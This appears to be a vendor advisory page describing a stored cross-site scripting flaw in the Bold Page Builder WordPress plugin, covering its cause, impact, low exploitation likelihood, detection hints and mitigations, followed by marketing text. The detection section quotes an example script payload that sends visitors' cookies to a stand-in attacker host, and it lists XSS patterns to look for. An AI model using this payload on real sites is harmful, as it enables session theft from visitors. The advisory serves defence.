
PEACH
Un cadre d’isolation des locataires
CVE-2026-2357 is a Stored Cross-Site Scripting (XSS) vulnerability in the Bold Page Builder plugin for WordPress, affecting all versions up to and including 5.6.8. The flaw exists in the plugin's bt_bb_shortcode shortcode handler due to insufficient input sanitization and output escaping on user-supplied attributes. It was published on August 16, 2026, and assigned by Wordfence. The vulnerability carries a CVSS v3.1 base score of 6.4 (Medium) (GitHub Advisory, Wordfence).
The root cause is CWE-79 (Improper Neutralization of Input During Web Page Generation), where user-supplied shortcode attributes passed to bt_bb_shortcode are neither properly sanitized on input nor escaped on output before being rendered in page content. An authenticated attacker with contributor-level access or higher can craft a malicious shortcode containing arbitrary JavaScript and embed it in a WordPress page or post. Because the payload is stored server-side, it executes in the browser of any user who subsequently visits the affected page — no additional user interaction beyond page access is required. A patch commit is referenced in the WordPress plugin repository (GitHub Advisory, Plugin Changeset).
Successful exploitation allows an authenticated contributor (or higher-privileged user) to permanently inject malicious JavaScript into WordPress pages, which executes in the browsers of all site visitors. This can result in session cookie theft, credential harvesting, unauthorized actions performed on behalf of victims (including administrators), and redirection to malicious external sites. While availability is not directly impacted, the confidentiality and integrity of user sessions and site content are at risk (GitHub Advisory, Wordfence).
There is no public proof-of-concept exploit and no evidence of in-the-wild exploitation at the time of disclosure. The EPSS score is 0.0, indicating a very low probability of exploitation in the near term. The vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog. Exploitation requires at minimum a contributor-level WordPress account, which limits the attack surface compared to unauthenticated vulnerabilities (GitHub Advisory, Wordfence).
/wp-content/plugins/bold-page-builder/readme.txt or using web scanning tools).bt_bb_shortcode element with a malicious attribute containing a JavaScript payload, e.g., an attribute value such as "><script>document.location='https://attacker.com/steal?c='+document.cookie</script>.wp-admin/post.php or REST API endpoints containing bt_bb_shortcode with unusual attribute values including <script>, javascript:, or encoded variants (%3Cscript%3E).wp_posts or wp_postmeta tables containing bt_bb_shortcode entries with embedded <script> tags or event handler attributes (e.g., onerror, onload) in shortcode attribute values.wp-content/plugins/bold-page-builder/ for unauthorized modifications.Update the Bold Page Builder plugin to a version newer than 5.6.8 as soon as a patched release is available; a fix commit has been submitted to the WordPress plugin repository (Plugin Changeset). As interim mitigations: restrict contributor and author roles to only fully trusted users; deploy a Web Application Firewall (WAF) configured to detect and block XSS payloads in shortcode parameters; and implement a strict Content Security Policy (CSP) header to limit inline script execution. Regularly audit page content for unexpected script injections and monitor user activity logs for unauthorized edits (Wordfence).
The vulnerability was reported and assigned by Wordfence, a leading WordPress security firm, and published to the GitHub Advisory Database on August 16, 2026. No notable independent researcher commentary, media coverage, or significant social media discussion beyond automated CVE tracking feeds has been observed at this time (GitHub Advisory, Wordfence).
Source: Ce rapport a été généré à l’aide de l’IA
Évaluation gratuite des vulnérabilités
Évaluez vos pratiques de sécurité cloud dans 9 domaines de sécurité pour évaluer votre niveau de risque et identifier les failles dans vos défenses.
Obtenez une démo personnalisée
"La meilleure expérience utilisateur que j’ai jamais vue, offre une visibilité totale sur les workloads cloud."
"Wiz fournit une interface unique pour voir ce qui se passe dans nos environnements cloud."
"Nous savons que si Wiz identifie quelque chose comme critique, c’est qu’il l’est réellement."